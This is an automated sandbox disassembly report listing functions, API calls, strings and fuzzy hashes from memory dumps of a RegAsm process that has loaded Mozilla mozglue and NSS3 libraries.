Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: 281e0e79a30636c0ea3afe6d9ea16e089e32c584453cdfa1700f75760703c023
Instruction ID: 855d801bb48232ed5a7b02e70cd06f41d1813da94d166c62392cf2f618f8a923
Opcode Fuzzy Hash: 281e0e79a30636c0ea3afe6d9ea16e089e32c584453cdfa1700f75760703c023
Instruction Fuzzy Hash: D2B1B2B0A0120A9FDB04CF94C699BEEBBB5AF94318F204039D501ABF84D771E945CBD1

Function 6C76C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C76C5A3
WideCharToMultiByte.KERNEL32 ref: 6C76C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C76C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C76CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C76CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C76CAA5

Strings

0, xrefs: 6C76D30A
(null), xrefs: 6C76C596

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 064e7b9da10e0213b85ca00390785c4762ce68b32e004b7a38ac85414ce8390f
Instruction ID: 1b0daa5b01b1b4cdfdedddd8b0e06a1892f292a73826c79ea250fe1fcb5ab7fc
Opcode Fuzzy Hash: 064e7b9da10e0213b85ca00390785c4762ce68b32e004b7a38ac85414ce8390f
Instruction Fuzzy Hash: 50A1BF306083429FDB00DF2ACA5475ABBE1BF89749F18882DED99D7B41D731E805CB96

Function 6C7448E0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,6C78483A,?), ref: 6C744ACB
memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C78483A,?), ref: 6C744AE0
moz_xmalloc.MOZGLUE(?,?,6C78483A,?), ref: 6C744A82

Part of subcall function 6C75CA10: mozalloc_abort.MOZGLUE(?), ref: 6C75CAA2

memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C78483A,?), ref: 6C744A97
moz_xmalloc.MOZGLUE(?,?,6C78483A,?), ref: 6C744A35

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C78483A,?), ref: 6C744A4A
moz_xmalloc.MOZGLUE(?,?,6C78483A,?), ref: 6C744AF4
moz_xmalloc.MOZGLUE(?,?,6C78483A,?), ref: 6C744B10
moz_xmalloc.MOZGLUE(?,?,6C78483A,?), ref: 6C744B2C

Strings

:Hxl, xrefs: 6C7448EB, 6C7449FB

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID: :Hxl
API String ID: 4251373892-1673119020
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: b572ad9b6a4bd2e5e1e519d758662a3aa35226626a4cc1c76d2f997346e7c895
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: 9B716CB1A00706DFCB54CF68C684AAABBF5FF18304B50863ED15A9BB41E731E555DB80

Function 6C76C769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C76C784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C76C801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C76C83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C76C891

Strings

INF, xrefs: 6C76C794
inf, xrefs: 6C76C78F
NAN, xrefs: 6C76C7AD
nan, xrefs: 6C76C7A8

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: 3b9336e4c0a3bfe59e939a3a8b833e55fc2d5a4800047ba234d6f211cecc3ba5
Instruction ID: 25738308a29f5d68903c8dfa17693a08a811e6eca7dc013f39ccd33896d1e7e5
Opcode Fuzzy Hash: 3b9336e4c0a3bfe59e939a3a8b833e55fc2d5a4800047ba234d6f211cecc3ba5
Instruction Fuzzy Hash: 8D51B6706087818BDB00DF6EC68169AFBF0BF9A345F00892DEDD5A7A50E770D9848B43

Function 6C743480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C743492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C7434A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C7434EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C74350E
__Init_thread_footer.LIBCMT ref: 6C743522
__aulldiv.LIBCMT ref: 6C743552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C74357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C743592

Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1

Strings

kernel32.dll, xrefs: 6C7434EA
GetSystemTimePreciseAsFileTime, xrefs: 6C743508

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 0b76c3c63b56258a473492db5baec828f702fc93a24e691c632da64baf405d16
Instruction ID: 34b9c4729275dc8e61743340ab067b36fd5ea9f73cd3bdccd43ea57558c0d85d
Opcode Fuzzy Hash: 0b76c3c63b56258a473492db5baec828f702fc93a24e691c632da64baf405d16
Instruction Fuzzy Hash: EB318F71B0020B9FDF14DFB9CA48AAAB7B9FB45705F104539E505E3660DB70AB04CB61

Function 6C8AECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C8ADE64), ref: 6C8AED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8AED22

Part of subcall function 6C8BB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9918D0,?), ref: 6C8BB095

PL_FreeArenaPool.NSS3(?), ref: 6C8AED4A
PL_FinishArenaPool.NSS3(?), ref: 6C8AED6B
PR_CallOnce.NSS3(6C9C2AA4,6C8C12D0), ref: 6C8AED38

Part of subcall function 6C7E4C70: TlsGetValue.KERNEL32(?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4C97
Part of subcall function 6C7E4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4CB0
Part of subcall function 6C7E4C70: PR_Unlock.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C8AED52
PR_CallOnce.NSS3(6C9C2AA4,6C8C12D0), ref: 6C8AED83
PL_FreeArenaPool.NSS3(?), ref: 6C8AED95
PL_FinishArenaPool.NSS3(?), ref: 6C8AED9D

Part of subcall function 6C8C64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C8C127C,00000000,00000000,00000000), ref: 6C8C650E

Strings

security, xrefs: 6C8AED06

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 0d13b398736fbcc24b661450c564defda7b753074692598a8e6595dc556cc91b
Instruction ID: 6e5ba13143fb778fe4a87df9948ef1a20105c61441a11cdef9148e479dcadf4a
Opcode Fuzzy Hash: 0d13b398736fbcc24b661450c564defda7b753074692598a8e6595dc556cc91b
Instruction Fuzzy Hash: 0B113D76A006046BD73057ADAE84BBB7278AF4160EF040D34E85563E81FB24E61DD7D7

Function 6C892CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C892CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C892D07

Part of subcall function 6C9709D0: PR_Now.NSS3 ref: 6C970A22
Part of subcall function 6C9709D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C970A35
Part of subcall function 6C9709D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C970A66
Part of subcall function 6C9709D0: PR_GetCurrentThread.NSS3 ref: 6C970A70
Part of subcall function 6C9709D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C970A9D
Part of subcall function 6C9709D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C970AC8
Part of subcall function 6C9709D0: PR_vsmprintf.NSS3(?,?), ref: 6C970AE8
Part of subcall function 6C9709D0: EnterCriticalSection.KERNEL32(?), ref: 6C970B19
Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C970B48
Part of subcall function 6C9709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C970C76
Part of subcall function 6C9709D0: PR_LogFlush.NSS3 ref: 6C970C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C892D22

Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(?), ref: 6C970B88
Part of subcall function 6C9709D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C970C5D
Part of subcall function 6C9709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C970C8D
Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970C9C
Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(?), ref: 6C970CD1
Part of subcall function 6C9709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C970CEC
Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970CFB
Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C970D16
Part of subcall function 6C9709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C970D26
Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970D35
Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C970D65
Part of subcall function 6C9709D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C970D70
Part of subcall function 6C9709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C970D90
Part of subcall function 6C9709D0: free.MOZGLUE(00000000), ref: 6C970D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C892D3B

Part of subcall function 6C9709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C970BAB
Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970BBA
Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C892D54

Part of subcall function 6C9709D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C970BCB
Part of subcall function 6C9709D0: EnterCriticalSection.KERNEL32(?), ref: 6C970BDE
Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(?), ref: 6C970C16

Strings

slotID = 0x%x, xrefs: 6C892D02
pPin = 0x%p, xrefs: 6C892D1D
pLabel = 0x%p, xrefs: 6C892D4F
C_InitToken, xrefs: 6C892CE7
ulPinLen = %d, xrefs: 6C892D36

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: abfa0ea54e7c0641734ba5f755d4ccf20a27426eaf7ac5a84eb6c806587a6e5c
Instruction ID: 0808c3eddc74664d34d60e4ba98c0b8202998c128ac403cf599e74f9f186b827
Opcode Fuzzy Hash: abfa0ea54e7c0641734ba5f755d4ccf20a27426eaf7ac5a84eb6c806587a6e5c
Instruction Fuzzy Hash: CF21D375206148EFDB20AB5CDE8CE453BB5FB8231EF585820F50893632DB75CA58CB61

Function 6C78EB90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78EBC1
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8,?,?,00000000,?,?,?,?,?), ref: 6C78EBCE

Strings

[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C78EA9B

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: getenv$AcquireCurrentExclusiveInit_thread_footerLockThread
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)
API String ID: 2301526405-1136413219
Opcode ID: 997d1103c1af6994d50b7fb06397afa81967fe2809fd5a1bdd23a60efaf236f8
Instruction ID: 23407753e2fbad7321d86c8f566dba0e7b2371019903f5f088b53f5d1c55c429
Opcode Fuzzy Hash: 997d1103c1af6994d50b7fb06397afa81967fe2809fd5a1bdd23a60efaf236f8
Instruction Fuzzy Hash: 9111DF76A0151A9FCF009FA4D90CA9A7B78EB05729F104231FE2997740D734AA058BE2

Function 6C744480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C784843,?), ref: 6C7445F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C784843,?), ref: 6C74468A
free.MOZGLUE(?,?,?,?,?,?,6C784843,?), ref: 6C7446C9
free.MOZGLUE(?), ref: 6C7446EF
free.MOZGLUE(?), ref: 6C744712
free.MOZGLUE(?), ref: 6C744735
free.MOZGLUE(?), ref: 6C744758
free.MOZGLUE(?), ref: 6C74477B
free.MOZGLUE(?), ref: 6C74479E

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 031942892b6f47bc7411eff29daf7bd5b372693f1111935e3af3b1cbd4db0fc7
Instruction ID: 99928f01a63bcd73c22bf665109ab4b8beccfa59778d082cc1e5a4e096c4f93e
Opcode Fuzzy Hash: 031942892b6f47bc7411eff29daf7bd5b372693f1111935e3af3b1cbd4db0fc7
Instruction Fuzzy Hash: F2B1E471A001508FDB18DE3DDA9476D77A6AF42328F188679E816DFF93D7309840BB82

Function 6C7AAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C7AAC52
CreateFileMappingW.KERNEL32 ref: 6C7AAC7D
GetSystemInfo.KERNEL32 ref: 6C7AAC98
MapViewOfFile.KERNEL32 ref: 6C7AACB0
GetSystemInfo.KERNEL32 ref: 6C7AACCD
MapViewOfFile.KERNEL32 ref: 6C7AAD05
UnmapViewOfFile.KERNEL32 ref: 6C7AAD1C
CloseHandle.KERNEL32 ref: 6C7AAD28
UnmapViewOfFile.KERNEL32 ref: 6C7AAD37
CloseHandle.KERNEL32 ref: 6C7AAD43
CloseHandle.KERNEL32 ref: 6C7AAD67

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 3bd7d3854a1cf44dc51e05bead8b395cb2fd6921974af83898b6f6a05ff2c3f3
Instruction ID: 157adefc775e27296e88900c96c67c7ca89d7e00ebee9775507b5663022f01b8
Opcode Fuzzy Hash: 3bd7d3854a1cf44dc51e05bead8b395cb2fd6921974af83898b6f6a05ff2c3f3
Instruction Fuzzy Hash: 7E3162B19047058FDB00AF78D64966EBBF4FF85715F018A3DE98587311EB70A589CB82

Function 6C77F2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C77D9DB), ref: 6C77F2D2
GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6C77F2F5
moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6C77F386
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C77F347

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C77F3C8
free.MOZGLUE(00000000,00000000), ref: 6C77F3F3
free.MOZGLUE(00000000,00000000), ref: 6C77F3FC
free.MOZGLUE(00000000,?,?,00000000), ref: 6C77F413

Strings

ntdll.dll, xrefs: 6C77F2F0

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: freemoz_xmalloc$HandleModule$malloc
String ID: ntdll.dll
API String ID: 301460908-2227199552
Opcode ID: fdd53d8710d30618154e84e4c70a2c9968217a95ceffff8cf0ca0e5468ad9039
Instruction ID: c30581c3d57057370ce757c64fe06bec9687a45712e7b019ba305756f9fc2cdb
Opcode Fuzzy Hash: fdd53d8710d30618154e84e4c70a2c9968217a95ceffff8cf0ca0e5468ad9039
Instruction Fuzzy Hash: CF4136B5E002098FDF148F29DA4879E77F4EF45318F60443DD81A97B80EB30A914C7A1

Function 6C7A6A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6A68
GetCurrentProcess.KERNEL32 ref: 6C7A6A7D
GetCurrentProcess.KERNEL32 ref: 6C7A6AA1
EnterCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6AAE
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C7A6AE1
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C7A6B15
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C7A6B65
LeaveCriticalSection.KERNEL32(6C7CF618,?,?), ref: 6C7A6B83

Strings

SymInitialize, xrefs: 6C7A6BA3

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
String ID: SymInitialize
API String ID: 3103739362-3981310019
Opcode ID: fa9dfaeb57fe5f0c4bf24689e69c5cd6de1dcd2bd49acff995a1ba99b68532d2
Instruction ID: 658d4f3cb80b929e2d2f8aa0761fdda027c89e77b9ae7e9b05e6b6d231cb5f96
Opcode Fuzzy Hash: fa9dfaeb57fe5f0c4bf24689e69c5cd6de1dcd2bd49acff995a1ba99b68532d2
Instruction Fuzzy Hash: 0541B0706053459FDB00CF78C989B9A3BB8EB46704F044579FD88DF282DB719649CBA2

Function 6C759620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C759675
__Init_thread_footer.LIBCMT ref: 6C759697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C7596E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C759707
__Init_thread_footer.LIBCMT ref: 6C75971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C759773

Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C7597B7
FreeLibrary.KERNEL32 ref: 6C7597D0
FreeLibrary.KERNEL32 ref: 6C7597EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C759824

Strings

